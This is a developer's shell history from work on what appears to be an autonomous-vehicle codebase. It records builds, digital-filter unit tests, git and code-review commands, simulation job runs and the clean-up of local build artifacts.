run_tests.sh +v +./run_tests.sh +google-chrome /home/mg/projects/didi/voyager/build/test_results/av_comm/gtest-av_comm_test.xml +vim run_tests.sh +v +find -name digital_filter_test +find -name test_digital_filter +find -name *digital_filter* +find -name *digitalfilter* +find -name *common_test +find -name *common_test* +v +find -name *test +v +v +v +v +v devel/ +v devel/share/ +v devel/share/av_comm/ +v devel/share/av_comm/cmake/ +v devel/lib/ +v devel/lib/av_comm/ +v +v +v Cmake +v +v +v +v +v +vim run_tests.sh +v +vim CMakeLists.txt +v +vim configure +v +v +v +vim CMakeLists.txt +v +v +v +v +find -name av_comm_test +find -name av_comm_test +./devel/lib/av_comm/av_comm_test +find -name parallel_for_benchmark +./devel/lib/av_comm/parallel_for_benchmark +find -name "*.txt" | xargs grep "math_util_test" +find -name "*.txt" | xargs grep "math_util_test"| vim - +v +find -name av_comm_test +v ./devel/lib/av_comm/av_comm_test +./devel/lib/av_comm/av_comm_test +./run_tests.sh +./devel/lib/av_comm/av_comm_test +./run_tests.sh +./devel/lib/av_comm/av_comm_test +./run_tests.sh +./devel/lib/av_comm/av_comm_test +./run_tests.sh +./devel/lib/av_comm/av_comm_test +./run_tests.sh +./devel/lib/av_comm/av_comm_test +./run_tests.sh +./devel/lib/av_comm/av_comm_test +./run_tests.sh +./devel/lib/av_comm/av_comm_test +./run_tests.sh +./devel/lib/av_comm/av_comm_test +./run_tests.sh +./devel/lib/av_comm/av_comm_test +./run_tests.sh +./devel/lib/av_comm/av_comm_test +./run_tests.sh +./devel/lib/av_comm/av_comm_test +./run_tests.sh +./devel/lib/av_comm/av_comm_test +./run_tests.sh +./devel/lib/av_comm/av_comm_test +./run_tests.sh +./devel/lib/av_comm/av_comm_test DigitalFilter +./devel/lib/av_comm/av_comm_test +./run_tests.sh +./devel/lib/av_comm/av_comm_test +./run_tests.sh +./devel/lib/av_comm/av_comm_test +./run_tests.sh +v +v +v +git clones.git +v +v +exit +v +v +v +git info +git remote +git info remote +git log +git clone +git log +git -h +git --help +git show +git --help +git clone +go clion +v +o clion +v +o clion +free -m +free -g +v +whereis clion +v +vim /opt/clion-2018.1.3/bin/clion.vmoptions +o clion +v +v +source devel/setup.bash +v +vim run_tests.sh +./run_tests.sh +find -name av_comm_test +./devel/lib/av_comm/av_comm_test | grep DigitalFilter +./run_tests.sh +./devel/lib/av_comm/av_comm_test +./run_tests.sh +./devel/lib/av_comm/av_comm_test +./run_tests.sh +./devel/lib/av_comm/av_comm_test +./run_tests.sh +./devel/lib/av_comm/av_comm_test +./run_tests.sh +./devel/lib/av_comm/av_comm_test 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show +git stash pop +git diff +git stash show +git status +git add onboard/common/av_comm/test/CMakeLists.txt +git status +git ci "added digital filter" +git commit "added digital filter" +git commit -m "added digital filter" +arc diff --preview +git log +v +git pull +o +whereis vim +type vim +vim ~/.bash_variables +source ~/.bash_variables +git status +git pull +v +git st +./play.sh +git log +./play.sh +vim play.sh +find -name voy_math_test +vim play.sh +./devel/lib/voy_math/voy_math_test --gtest_filter=DigitalFilter.* +git diff +git pull +git status +git ci -a -m "change digital filter to new math dir" +git commit -a -m "change digital filter to new math dir" +git pull +history |grep ar +arc diff --preview +git diff +git commit --ament +git commit --amend +git diff +git add onboard/common/math/include/math/digital_filter.h +git commit --amend +git diff +arc diff --preview +git add onboard/common/math/include/math/digital_filter.h +git commit --amend + +git pull +./play.sh +sudo pip install +sudo pip install pytest +./play.sh +git diff +./play.sh +git status +git add -a +git add -u +git st +git status +git diff +git commit -m "patch +git commit -m "patch D153694" +git pull +git st +git status +./play.sh +arc diff --update D153694 +v +python digital_filter.py +ipython digital_filter.py +pip install ipython +ipython digital_filter.py +ipython -m pdb digital_filter.py +ipython digital_filter.py +python digital_filter.py +v +find -name "*.cpp" | xargs grep "find" | grep "Map" +find -name "*.cpp" | xargs grep "find" | grep "Map" +find -name "*.cpp" | xargs grep "find" | grep "Map" +find -name "*.cpp" | xargs grep "find" +vim ./offboard/calibration/lidar_calibration/src/cost_functor.cpp +find -name "*.cpp" | xargs grep "make_uniq" +vim ./offboard/perception/training/extractor/bbox_with_points_extractor.cpp +:q +exit +top +cat /proc/cpuinfo +exit +v +find -name train_trip + +find -name *trip*train +find -name train*trip* +find -name *train*trip* +v +google-chrome /tmp/track_eval_report.configA.html +vim play.sh +./build_package.sh +v devel/ +v devel/bin/collectd.py +v devel/lib/ +vim play.sh +vim build_binary.sh +sh build_binary.sh +vim build_binary.sh +sh build_binary.sh +find -name cloud_sim +vim build_package.sh +vim build_binary.sh +vim build_package.sh +v +vim build_binary.sh +./build_package.sh +v +./build_bin +chmod 755 build_binary.sh +./build_binary.sh +vim build_binary.sh +./build_binary.sh +vim build_binary.sh +./build_binary.sh +vim play.sh +find -name cloud_sim_status.py +vim ./offboard/simulation/cloud_sim/python/cloud_sim_status.py +vim ./build/offboard/simulation/cloud_sim/catkin_generated/installspace/cloud_sim_status.py +v +vim build_binary.sh v +v +mv /tmp/track_eval_report.html /tmp/track_eval_report.config0.html +v +vim play.sh +./build_binary.sh +vim build_binary.sh +./build_binary.sh +vim build_binary.sh 1 +./build_binary.sh +./build_binary.sh 1 +./build_binary.sh 2 +./build_binary.sh 1 +vim build_binary.sh +./run_tests.sh +vim play.sh +./devel/lib/voy_math/voy_math_test --gtest_filter=DigitalFilterTest.* +./run_tests.sh +./devel/lib/voy_math/voy_math_test --gtest_filter=DigitalFilterTest.* +./run_tests.sh +./devel/lib/voy_math/voy_math_test --gtest_filter=DigitalFilterTest.* +git status +git diff +exit +v +exit +v /tmp +v /tmp/track_eval_report.config +exit +v +open Figure_1.png +google-chrome Figure_1.png +v +rm CL-181.5087.36_mg_08.06.2018_15.36.30.zip +v +v +rm _hdp_g_voyager_prod_voyager_rosbag_rosbag_2018_01_16_11010_11010_default_2018-01-16-15-* +v +v +vim o +v +v +vim play.sh +vim play.sh +v +v +rosrun perception_training track_reporter +source ~/.bash_variables +source devel/setup.sh +rosrun perception_training track_reporter --experiment_id mgguanjian-TOHS-test_tasks_max_distance20-config0-cloud --output_path mgguanjian-TOHS-test_tasks_max_distance20-config0-cloud.2018.6.15.html +rosrun perception_training track_reporter --experiment_id mgguanjian-TOHS-test_tasks_max_distance20-configB-cloud --output_path mgguanjian-TOHS-test_tasks_max_distance20-configB-cloud.2018.6.15.html +v +google-chrome mgguanjian-TOHS-test_tasks_max_distance20-config*2018* +sz mgguanjian-TOHS-test_tasks_max_distance20-config0-cloud.2018.6.15.html +sudo apt install lrzsz +sz mgguanjian-TOHS-test_tasks_max_distance20-config0-cloud.2018.6.15.html +pwd +readlink -f lidar_train.txt +wc -l /home/mg/projects/didi/voyager/offboard/perception/training/dataset/lidar_test.txt +wc -l /home/mg/projects/didi/voyager/offboard/perception/training/dataset/lidar_train.txt +git st +git status +./play.sh +arc diff --update D153694 +v +find | xargs grep "TestSuite" +find -type f | xargs grep "TestSuite" +find -name "*.cpp" | xargs grep "TestSuite" +find -name "*.cpp" | xargs grep "Test" +find -name "*.cpp" | xargs grep "Test_F" +find -name "*.cpp" | xargs grep "TEST_F" +vim ./offboard/perception/training/accessor/test/result_table_test.cpp +ipython +v +./play.sh +v +./configure +bash build_backage.sh +v +sh build_package.sh +rm /home/mg/projects/didi/voyager/build/CMakeCache.txt +sh build_package.sh +./configure +sh build_pacakge.sh +sh build_package.sh +source devel/setup.bash +sh build_package.sh +./configure +sh build_package.sh +find -name "*.cpp" | xargs grep "TEST_F" +vim ./offboard/perception/training/evaluation/test/track_evaluator_test.cpp +find -name "*.cpp" | xargs grep "Setup" +./onboard/common/math/src/digital_filter_test.cpp +./onboard/common/math/src/digital_filter_test.cpp +./onboard/common/math/src/digital_filter_test.cpp +./onboard/common/math/src/digital_filter_test.cpp +vim ./onboard/common/math/src/digital_filter_test.cpp +find -name "*.cpp" | xargs grep "Setup" +find -name "*.cpp" | xargs grep "SetUp" +v +find -name "*.h" | xargs grep "10e-6" +find -name "*.h" | xargs grep "10e-5" +find -name "*.h" | xargs grep "10e-6" +find -name "*.h" | xargs grep "kEp" +v +v +v +v +python filter_reporter.py +o clion +type python +python +v +v +git clonestyleguide.git +v +find -name cpplint.py +readlink -f ./styleguide/cpplint/cpplint.py +v +j voya +v +git status +git history +git log +j home +j ~ +v +clion +vim o +v +sudo apt-get install openssh-server +sudo addgroup ftpaccess +vim /etc/ssh/sshd_config +sudo vim /etc/ssh/sshd_config +sudo service ssh restart +ifconfig +v +o clion +pyenv show +pyenv --listh +pyenv --list +pyenv +pyenv versions +pyenv global 2.7.15 +python +python --version +type python +pip install numpy +pip install matplotlib +v +j voyager +v +./run_tests.sh +v +source devel/setup.bash +v +./build_backage +./build_package.sh +pyenv global system +./build_package.sh +source devel/setup.bash +./configure +sh build_backage +sh build_package.sh +git diff +git log +v +git st +git status +git add -u +git st +git diff offboard/perception/training/evaluation/python/digital_filter.py +git diff offboard/perception/training/evaluation/python/filter_reporter.py +git diff offboard/perception/training/evaluation/track_evaluator.cpp +git diff offboard/perception/training/evaluation/track_evaluator.h +git diff onboard/common/math/include/math/digital_filter.h +git diff onboard/common/math/src/digital_filter.cpp +git diff onboard/common/math/src/digital_filter_test.cpp +git st +git status +git add onboard/common/math/src/digital_filter_test.cpp +git st +git status +git commit -m "finish the coding of FilterWithTimestamp, before unittest" +git st +git status +sh build_package.sh +pyenv versions +type python +echo $PATH +export PATH=`echo $PATH | python -c "import sys, re; print(':'.join(x for x in sys.stdin.read().strip().split(':') if not 'pyenv' in x))"` +echo $PATH +type python +./play.sh +whereis pyenv +find ~ -name pyenv +./play.sh +make clean +./play.sh +find -name av_comm_test.dir +./clean +./clean.sh +find -name av_comm_test.dir +./play.sh +./clean.sh +find -name av_comm_test.dir +v +git status +v onboard/common/av_comm +rm onboard/common/av_comm/CMakeCache.txt +rm onboard/common/av_comm/CTestTestfile.cmake +rm -rf onboard/common/av_comm/catkin_generated/ +rm -rf onboard/common/av_comm/test/CMakeCache.txt +git status +rm -rf onboard/common/av_comm/test/tools/cmake_install.cmake +rm -rf onboard/common/av_comm/test/tools/*.cmake +git status +rm -rf onboard/common/av_comm/test/tools/Makefile onboard/common/av_comm/test/tools/CMakeFiles/ onboard/common/av_comm/test/Makefile onboard/common/av_comm/test/CTestTestfile.cmake onboard/common/av_comm/test/CMakeFiles/ onboard/common/av_comm/cmake_install.cmake +git status +rm -rf onboard/common/av_comm/test/cmake_install.cmake +rm -rf onboard/common/av_comm/CMakeFiles/ +rm -rf onboard/common/av_comm/Makefile +v onboard/common/av_comm/catkin/ +rm -rf onboard/common/av_comm/catkin/ +v onboard/common/av_comm/gtest/ +rm -rf onboard/common/av_comm/gtest/ +git st +git status +git diff +./configure +bash build_package.sh +./play.sh +bash build_package.sh +./clean.sh +bash build_package.sh +./configure +bash build_package.sh +./configure +bash build_package.sh +./clear.sh +./clean.sh +./configure +bash build_package.sh +./play.sh +vim play.sh +./play.sh +./build_package.sh +./play.sh +./build_package.sh +./play.sh +git status +git drd/perception/training/evaluation/python/filter_reporter.pyiff +git diff offboard/perception/training/evaluation/python/filter_reporter.py +git diff offboard/perception/training/evaluation/track_evaluator.cpp +git st +git status +git add -u +git status +git ci -m "unittest passed" +git commit -m "unittest passed" +git fetch +vim play.sh +./build_package.sh +vim play.sh +./play.sh +vim play.sh +./play.sh +vim play.sh +./play.sh +vim play.sh +find -name generate_perception_labeling.py +vim ./offboard/simulation/data_sim/python/generate_perception_labeling.py +vim play.sh +./play.sh +vim /home/mg/projects/didi/voyager/offboard/simulation/data_sim/python/data_sim/voy_data_utils/trail_rpc.py +./play.sh +vim /home/mg/projects/didi/voyager/offboard/simulation/data_sim/python/data_sim/voy_data_utils/trail_rpc.py +./play.sh +git fetch +git status +git diff +git add -u +git commit -m "bug fix" +git st +git co master +git checkout master +git pull +git checkout - +./configure +./build_package.sh +pip install mako +sudo pip install mako +./build_package.sh +vim play.sh +./play.sh +vim play.sh +./play.sh +v /home/mg/projects/didi/voyager/offboard/simulation/data_sim/ +vim play.sh +v /home/mg/projects/didi/voyager/offboard/simulation/data_sim/ +./play.sh +vim play.sh +find -name "track_reporter" +./devel/lib/perception_training/track_reporter +vim play.sh +./devel/lib/perception_training/track_reporter --experiment_id=mgguanjian-TOHS-task:10910-configA +mv /tmp/track_eval_report.html /tmp/track_eval_report.configA.html +vim play.sh +./play.sh +google-chrome /tmp/track_eval_report.html +./play.sh +vim ./play.sh +./play.sh +google-chrome /tmp/track_eval_report.html +vim play.sh +pwd +vim play.sh +v +vim build_binary.sh +v +vim play.sh +./play.sh +vim ./play.sh +./play.sh +vim play.sh +./play.sh +vim play.sh +./play.sh +vim /home/mg/projects/didi/voyager/offboard/simulation/cloud_sim/python/generate_perception_labeling.py +find -name setup_job_status_parser.py +find -name setup_job_status_parser +vim play.sh +git diff /home/mg/projects/didi/voyager/offboard/simulation/cloud_sim/python/cloud_sim_client.py +rosrun cloud_sim cloud_sim_worker.py +touch /var/log/voyager/worker.log +rosrun cloud_sim cloud_sim_worker.py +rosrun cloud_sim cloud_sim_client.py +git log +./clean.sh +v +./configure +./build_package.sh +./build_package.sh cloud_sim +rosrun cloud_sim cloud_sim_client.py +git log +git fetch +git status +git diff +git commit -a -m "change py" +git checkout master +git pull +git checkout - +git merge master +./build_package.sh cloud_sim +rosrun cloud_sim cloud_sim_client.py +git log +rosrun cloud_sim cloud_sim_client.py +vim cloud_sim_status.py +vim cloud_sim_client.py +python cloud_sim_client.py +vim cloud_sim_client.py +python +python cloud_sim_client.py +python +python -m cloud_sim_status +python -m cloud_sim_client +vim cloud_sim_client.py +python cloud_sim_client.py +vim cloud_sim_client.py +find ./ -name "cloud_sim_status.py" +find ./ -name "cloud_sim_status.py" +vim cloud_sim_client.py +python cloud_sim_client.py +python cloud_sim_client.py upload_binary.py +vim cloud_sim_client.py +python cloud_sim_client.py upload_binary.py +vim cloud_sim_client.py +python cloud_sim_client.py upload_binary.py +vim cloud_sim_client.py +ls -alrt +vim cloud_sim_client.py +python cloud_sim_client.py +vim cloud_sim_client.py +python cloud_sim_client.py +rm cloud_sim_status.pyc +python cloud_sim_client.py +ls -alrt +vim local_sim_executor.py +python local_sim_executor.py +vim cloud_sim_status.py +python cloud_sim_client.py +vim cloud_sim_status.py +python cloud_sim_client.py +vim cloud_sim_client.py +rosrun cloud_sim cloud_sim_client.py +./play.sh +rosrun cloud_sim cloud_sim_client.py status 2656 +./build_binary.sh +./play.sh +vim ./play.sh +./play.sh +rosrun cloud_sim cloud_sim_client.py status 2662 +watch rosrun cloud_sim cloud_sim_client.py status 2662 +v +rm \' +v +vim play.sh +v +vim play.sh +v +./play.sh +vim play.sh +./play.sh +./devel/lib/perception_training/track_reporter --experiment_id=mgguanjian-TOHS-task:10910-configB +mv /tmp/track_eval_report.html /tmp/track_eval_report.configB.html +google-chrome /tmp/track_eval_report.configB.html +v +vim ./play.sh +./build_package.sh +vim ./play.sh +./build_package.sh +./play.sh +find -name track_evaluator +find -name track_ +find -name track_* +find -name track_*ev*tor +find -name track_*r +vim ./play.sh +find -name track_evaluator +find -name track_*r +./build_package.sh track_evaluator +./build_package.sh track_evaluator | grep track +vim ./play.sh +./play.sh +watch rosrun cloud_sim cloud_sim_client.py status 2664 +vim ./play.sh +v +./play.sh +vim ./play.sh +./play.sh +v +c +git log +git fetch +git pull +git log +git status 784b878a34b64b49b3129fde776fa7af03546c20 +git diff 784b878a34b64b49b3129fde776fa7af03546c20 +git status +git add -u +git status +vim play.sh +./play.sh +git status +git diff offboard/perception/training/evaluation/track_evaluator.h +git commit -m "cleaned track_evaluator" +vim ./play.sh +./play.sh +git ci -m -a "bug fix" +git commit -m -a "bug fix" +git commit -a -m "bug fix" +./play.sh +git fetch +git pull +./run_tests.sh +./devel/lib/voy_math/voy_math_test --gtest_filter=DigitalFilter.* +./devel/lib/voy_math/voy_math_test --gtest_filter=DigitalFilterTest.* +arc diff --preview +./run_tests.sh +./devel/lib/voy_math/voy_math_test --gtest_filter=DigitalFilterTest.* +git commit -a --amend +git st +git status +./devel/lib/voy_math/voy_math_test --gtest_filter=DigitalFilterTest.* +arc diff --preview +git commit -a --amend +arc diff --preview +git commit -a --amend +arc diff --preview +git commit -a --amend +arc diff --preview +vim play.sh +./play.sh +arc diff --preview +git st +git status +git commit -a --amend +arc diff --preview +git commit -a --amend +arc diff --preview +grep DISALLOW_COPY *.cpp +find -name "*.cpp" | xargs grep DISALLOW +vim ./onboard/common/trace/src/trace_session.cpp +vim ./offboard/lego/core/src/graph/interlocker.cpp +vim ./offboard/lego/core/src/io/encoder.cpp +vim ./offboard/lego/core/src/brick/brick.cpp +git fetch +git branch +git pull +v +vim play.sh +./play.sh +v +./play.sh +v +./configure +sh build_package.sh +v +find -name run_tests.sh +find -name run_test.sh +find -name run_test.sh +find -name run_tests.sh +v +sh build_package.sh +find -name run_tests.sh +find -name run_tests.bash +v +./run_tests.py +./run_tests.py fast +vim play.sh +./devel/lib/voy_math/voy_math_test --gtest_filter=DigitalFilterTest.* +./play.sh +git fetch +git pull +arc diff --update D153694 +v +git status +v +vim build_package.sh +v +vim CMakeLists.txt +sh clean.sh +./configure +./bash build_package.sh > build_package.log 2>&1 +bash build_package.sh |tee build_package.log +v +vim build_package.log +v +less build_package.log +cat build_package.log +v +rm build_pacakge.log +v +rm build_pacakge.log +v +rm build_package.log +v +git status +git checkout -- cmake/flags.cmake +git status +v +git status +git pull +git status +./build_package.sh +./play.sh +git pull +git log +arc land --revision D153694 +vim play.sh +v +git log +vim ~/.gitconfig +git st +vim ~/.gitconfig +vim a +git add a +git unstage a +git st +rm a +v +git log +v +git log -1 +git log -2 +vim ~/.gitconfig +git lg +git pull +git lg +git pull +v +git br +git co dev* +git co dev +git co dev_perdiction_head_smoothing_tmp_expr +git log +git st +v +find -name digital_filter.py +git merge master +git st +git ci -m "merge master" +git st +find -name digital_filter.py +vim play.sh +./clean.sh +vim play.sh +v +vim play.sh +v +./configure +v +vim play.sh +./play.sh +vim play.sh +v +./play.sh +vim play.sh +./play.sh +vim play.sh +./play.sh +vim play.sh +./play.sh +vim play.sh +./play.sh +vim play.sh +./play.sh +v +vim play.sh +find -name track_evaluation +find -name track_evaluator +vim play.sh +find -name track_evaluator +find -name track_evaluator* +./build_pacakge +./build_package.sh +source devel/setup.bash +find -name track_evaluator +./play.sh +history +vim play.sh +./play.sh +vim play.sh +./play.sh +v +google-chrome mgguanjian-TOHS-typical_tasks-config* +v +vim play.sh +./play.sh +v +vim play.sh +./play.sh +vim build_binary.sh +./play.sh +vim build_binary.sh +./play.sh +vim build_binary.sh +./play.sh +vim build_binary.sh +./play.sh +v +vim play.sh +vim ./play.sh +vim play.sh +./play.sh +vim play.sh +./play.sh +vim play.sh +./play.sh +vim play.sh +./play.sh +vim play.sh +./play.sh +google-chrome /home/mg/projects/didi/voyager/mgguanjian-TOHS-typical_tasks_max_distance20-configB-cloud.html +vim play.sh +cat play.sh | grep cloud_sim +v +vim build_binary.sh +v ../tmp_data/ +v ../tmp_data/BINARY_FOR_BREDICTION_HEADING_SMOOTHING/ +v +vim build_binary.sh +man tar +vim build_binary.sh +./play.sh +vim play.sh +v +v ../tmp_data/ +rm ../tmp_data/BINARY_FOR_BREDICTION_HEADING_SMOOTHING.tar.gz +./play.sh +v /tmp/tmp.AIR6fEdseP +v /tmp/tmp_data/BINARY_FOR_BREDICTION_HEADING_SMOOTHING +vim build_binary.sh +v ../tmp_data/ +v +tar cvzf BINARY_FOR_BREDICTION_HEADING_SMOOTHING.tar.gz +tar xvzf BINARY_FOR_BREDICTION_HEADING_SMOOTHING.tar.gz +v +vim build_binary.sh +vim build_install.sh +v +vim build_binary.sh +v /tmp/tmp_data/ +v /tmp/tmp_data/BINARY_FOR_BREDICTION_HEADING_SMOOTHING/ +v /tmp/tmp_data/BINARY_FOR_BREDICTION_HEADING_SMOOTHING/bin/lib +v /tmp/tmp_data/BINARY_FOR_BREDICTION_HEADING_SMOOTHING/lib/ +v /tmp/tmp_data/BINARY_FOR_BREDICTION_HEADING_SMOOTHING/lib/perception_training/ +v +mv tmp_data/BINARY_FOR_BREDICTION_HEADING_SMOOTHING ~/projects/didi/tmp_data/ +v +rm BINARY_FOR_BREDICTION_HEADING_SMOOTHING.tar.gz +vim ../voyager/build_binary.sh +vim ../voyager/build_install.sh +v +mv truck.py model-manifest.txt BINARY_FOR_BREDICTION_HEADING_SMOOTHING/ +v +tar cvzf BINARY_FOR_BREDICTION_HEADING_SMOOTHING.tar.gz -C BINARY_FOR_BREDICTION_HEADING_SMOOTHING . +v +v +vim play.sh +./play.sh +vim play.sh +./play.sh +watc +git fetch +git pull +git co master +git status +git br +git add build_binary.sh play.sh typical_tasks.txt -u +git st +git add build_binary.sh play.sh typical_tasks.txt +git add -u +git st +git ci -m "all expr code done" +git co master +git pull +git co - +git merge master +vim play.sh +./play.sh +vim play.sh +./play.sh +v ../tmp_data +vim play.sh +./play.sh +vim play.sh +./play.sh +vim play.sh +./play.sh +v +vim play.sh +v +vim ~/.bash_aliases +source ~/.bash_aliases +open mgguanjian-TOHS-t*2018* +v +vim play.sh +./play.sh +v +rm ../tmp_data/BINARY_FOR_BREDICTION_HEADING_SMOOTHING.tar.gz +vim build_binary.sh +./play.sh +v ../tmp_data +vim play.sh +./play.sh +git st +git add *.html +git add -u +git ci -m "expring" +git co master +git pull +v +git st +v +git st +git ci -m "dynamic digital filter to be test" +git ci -m "dynamic digital filter to be tested" +git ci -a -m "dynamic digital filter to be tested" +git co - +v +vim play.sh +git br +git push +git push --set-upstream origin dev_perdiction_head_smoothing_tmp_expr +v +git br +git st +git co master +git pull +git log +v +git co - +git merge master +vim play.sh +./play.sh +vim play.sh +./play.sh +vim play.sh +./devel/lib/voy_math/voy_math_test --gtest_filter=DigitalFilterTest.* +./play.sh +./devel/lib/voy_math/voy_math_test --gtest_filter=DigitalFilterTest.* +./play.sh +./devel/lib/voy_math/voy_math_test --gtest_filter=DigitalFilterTest.* +./play.sh +./devel/lib/voy_math/voy_math_test --gtest_filter=DigitalFilterTest.* +./play.sh +./devel/lib/voy_math/voy_math_test --gtest_filter=DigitalFilterTest.* +v +ulimit -a +ulimit -c 2000000 +ulimit -c 200000000 +ulimit -c 20000000 +ulimit -c 2000000 +ulimit -a +./devel/lib/voy_math/voy_math_test --gtest_filter=DigitalFilterTest.* +v +gdb core ./devel/lib/voy_math/voy_math_test +gdb ./devel/lib/voy_math/voy_math_test core +v +rm core +./play.sh +./devel/lib/voy_math/voy_math_test --gtest_filter=DigitalFilterTest.* +rm core ; ./play.sh +./devel/lib/voy_math/voy_math_test --gtest_filter=DigitalFilterTest.* +v +gdb ./devel/lib/voy_math/voy_math_test core +kill %1 +kill -9 %1 +jobs +v +rm core +./play.sh +gdb ./devel/lib/voy_math/voy_math_test core +v +cat play.sh | grep TEST +cat play.sh | grep Test +./devel/lib/voy_math/voy_math_test --gtest_filter=DigitalFilterTest.* +./play.sh +./devel/lib/voy_math/voy_math_test --gtest_filter=DigitalFilterTest.* +./play.sh +./devel/lib/voy_math/voy_math_test --gtest_filter=DigitalFilterTest.* +:w +./play.sh +./devel/lib/voy_math/voy_math_test --gtest_filter=DigitalFilterTest.* +gdb ./devel/lib/voy_math/voy_math_test +kill -9 %1 +./play.sh +./devel/lib/voy_math/voy_math_test --gtest_filter=DigitalFilterTest.* +./play.sh +v +rm core +v +vim play.sh +v +vim play.sh +v +rm ../tmp_data/BINARY_FOR_BREDICTION_HEADING_SMOOTHING.tar.gz +vim play.sh +./play.sh +v +vim play.sh +./play.sh +v +vim play.sh +./play.sh +./play.sh > play.log +v +vim play.log +v +open mgguanjian-TOHS-typical_tasks_max_distance20-1-configB-local.html +vim play.log +v +vim play.sh +./play.sh +vim play.sh +./play.sh +vim play.sh +rosrun cloud_sim local_sim_executor.py +vim play.sh +rosrun cloud_sim local_sim_executor.py +./play.sh +rosrun cloud_sim generate_perception_labeling.py -f /home/mg/projects/didi/voyager/typical_tasks.txt -a "--enable_track_evaluator --experiment_id mgguanjian-TOHS-typical_tasks_max_distance20-true-configB-local --max_distance 20 --use_dynamic_filter true --heading_filter --heading_filter_opts configB" +vim play.sh +./play.sh +v +vim play.sh +./play.sh +open /home/mg/projects/didi/voyager/mgguanjian-TOHS-typical_tasks_max_distance20-true-config0-local.html +v +open mgguanjian-TOHS-typical_tasks_max_distance20-true-configB-local.html +vim play.sh +./play.sh +vim play.sh +./play.sh +v +open mgguanjian-TOHS-typical_tasks_max_distance20-dynamic-config0-local.html +v +vim play.sh +v +git co - +v +vim play.sh +./play.sh +v +mv mgguanjian-TOHS-typical_tasks_max_distance20-dynamic-config0-local.html +mv mgguanjian-TOHS-typical_tasks_max_distance20-true-config0-local.html mgguanjian-TOHS-typical_tasks_max_distance20-dynamic-config0-local.html +v +rm mgguanjian-TOHS-typical_tasks_max_distance20-1-configB-local.html +v +rm play.log +v +rm mgguanjian-TOHS-typical_tasks_max_distance20_dynamic-configB-local.html +v +rm mgguanjian-TOHS-typical_tasks_max_distance20-true-configB-local.html +v +vim play.sh +./play.sh +vim play.sh +./play.sh +vim play.sh +./play.sh +:q +vim play.sh +./play.sh +v +open mgguanjian-TOHS-typical_tasks_max_distance20-dynamic-config* +vim play.sh +./play.sh +v +vim play.sh +source devel/setup.bash +rosrun cloud_sim cancel 1596 +rosrun cloud_sim cancel 3152 +vim play.sh +rosrun cloud_sim cloud_sim_client.py cancel 3152 +rosrun perception_training track_reporter --experiment_id=mgguanjian-TOHS-test_tasks_max_distance20-dynamic-config0-cloud --output_path /home/mg/projects/didi/voyager/mgguanjian-TOHS-test_tasks_max_distance20-dynamic-config0-cloud.html +rosrun perception_training track_reporter --experiment_id=mgguanjian-TOHS-test_tasks_max_distance20-dynamic-config0-cloud --output_path /home/mg/projects/didi/voyager/mgguanjian-TOHS-test_tasks_max_distance20-dynamic-configB3k-cloud.html +v +open mgguanjian-TOHS-test_tasks_max_distance20-dynamic-config* +v +vim play.sh +rosrun perception_training track_reporter --experiment_id=mgguanjian-TOHS-test_tasks_max_distance20-dynamic-configB3k-cloud --output_path /home/mg/projects/didi/voyager/mgguanjian-TOHS-test_tasks_max_distance20-dynamic-configB3k-cloud.html +open /home/mg/projects/didi/voyager/mgguanjian-TOHS-test_tasks_max_distance20-dynamic-configB3k-cloud.html +git st +git add -u +git add mgguanjian* +git st +git ci -m "finished the dynamic filter on test_set, check:_distance20-dynamic-config0-cloud and _distance20-dynamic-configB3k-cloud" +v +git co - +git pull +v build +v build/onboard/ +v build/offboard/ +v build/offboard/perception/ +v build/offboard/perception/training/ +v build/offboard/perception/training/python/ +find -name generate_perception_labeling.py +v ./build/offboard/simulation/cloud_sim/catkin_generated/installspace/ +v ./build/offboard/simulation/cloud_sim/catkin_generated/installspace/generate_prediction_labeling.py +vim ./build/offboard/simulation/cloud_sim/catkin_generated/installspace/generate_prediction_labeling.py +git st +git stash +git co - +vim /etc/sysctl.conf +svim ./build/offboard/simulation/cloud_sim/catkin_generated/installspace/generate_prediction_labeling.pyudo vim /etc/sysctl.conf +ystemit co - +sudo sysctl -p --system +rosrun perception_training track_evaluator +ls +source devel/setup.sh +rosrun perception_training track_evaluator +rosrun perception_training lidar_evaluator +ls +vim +vim CMakeLists.txt +ls +ls +vim CMakeLists.txt +v +v +find -name generate_perception_labeling.py +vim ./offboard/simulation/cloud_sim/python/generate_perception_labeling.py +v +vim play.sh +vim ./offboard/simulation/cloud_sim/python/generate_perception_labeling.py +vim play.sh +./play.sh +v /tmp/track_eval_report.html +v +google-chrome mgguanjian-TOHS-typical_tasks-config0.html +rosrun perception_training table_status.py -r -p test +vim play.sh +rosrun perception_training table_status.py -r -p mgguanjian-TOHS-typical_task-config0 +rosrun perception_training table_status.py -r -p mgguanjian-TOHS-typical_tasks-config0 +../tools/truck.py manifest pull +rosrun perception_training table_status.py -r -p mgguanjian-TOHS-typical_tasks-config0 +v +./play.sh +v +google-chrome mgguanjian-TOHS-typical_tasks-config* +vim play.sh +./play.sh +vim play.sh +history +rosrun perception_training table_status.py -r -p mgguanjian-TOHS-typical_tasks-config0 +v +v +open mgguanjian-TOHS-typical_tasks_max_distance20-config0.html +google-chrome mgguanjian-TOHS-typical_tasks_max_distance20-config0.html +v +google-chrome mgguanjian-TOHS-typical_tasks_max_distance20-configB.html +vim play.sh +top +v +top +v +find -name table_status +find -name table_status.py +vim play.sh +./play.sh +vim play.sh +./play.sh +vim play.sh +./play.sh +vim play.sh +./play.sh +vim play.sh +./play.sh +rosrun cloud_sim cloud_sim_client.py status 2918 +find -name statup.bash +find -name setup.bash +v +vim play.sh +./play.sh +v +v ../tmp_data/ +v ../tmp_data/BINARY_FOR_BREDICTION_HEADING_SMOOTHING/ +v +v ../tmp_data/BINARY_FOR_BREDICTION_HEADING_SMOOTHING +v ../tmp_data/BINARY_FOR_BREDICTION_HEADING_SMOOTHING.tar.gz +v /home/mg/projects/didi/voyager/offboard/perception/training/dataset/lidar_test.txt +ifconfig +gits t +git st +git ci -a -m "DynamicDigitalFilter unit test passed" +./play.sh +v +vim play.sh +./play.sh +vim play.sh +./play.sh +vim play.sh +head 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--experiment_id=mgguanjian-TOHS-test_tasks_max_distance20-static-configB3k-cloud --output_path /home/mg/projects/didi/voyager/mgguanjian-TOHS-test_tasks_max_distance20-static-configB3k-cloud.html +v +open mgguanjian-TOHS-test_tasks_max_distance20-*-cloud.html +v +vim /etc/sysctl.conf +sudo vim /etc/sysctl.conf +sudo sysctl -p --system +sudo pip install keras +sudo pip install tensorflow +v +type python +python +v +vim play.sh +v +vim play.sh +./play.sh +vim play.sh +./play.sh +vim play.sh +clear +./play.sh +vim tmp.txt +ifconfig +rosrun perception_training table_status.py -r -p 